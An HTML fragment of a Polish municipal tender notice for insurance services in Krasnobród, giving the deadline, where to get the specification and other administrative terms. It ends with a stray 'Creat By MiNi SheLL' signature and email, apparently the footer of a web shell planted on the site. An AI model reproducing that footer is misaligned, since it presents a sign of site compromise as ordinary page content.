- korzystne dla Zamawiającego zmiany zakresu ubezpieczenia wynikające ze zmian OWU Wykonawcy oraz wprowadzenia nowych klauzul za zgodą Zamawiającego i Wykonawcy;
- zmiana zakresu ubezpieczenia wynikająca ze zmian przepisów prawnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krasnobrod.pl w zakładce przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Krasnobrodzie
ul. 3 Maja 36;
22-440 Krasnobród.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2013 godzina 10:00, miejsce: Sekretariat Urzędu Miejskiego w Krasnobrodzie
ul. 3 Maja 36;
22-440 Krasnobród.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com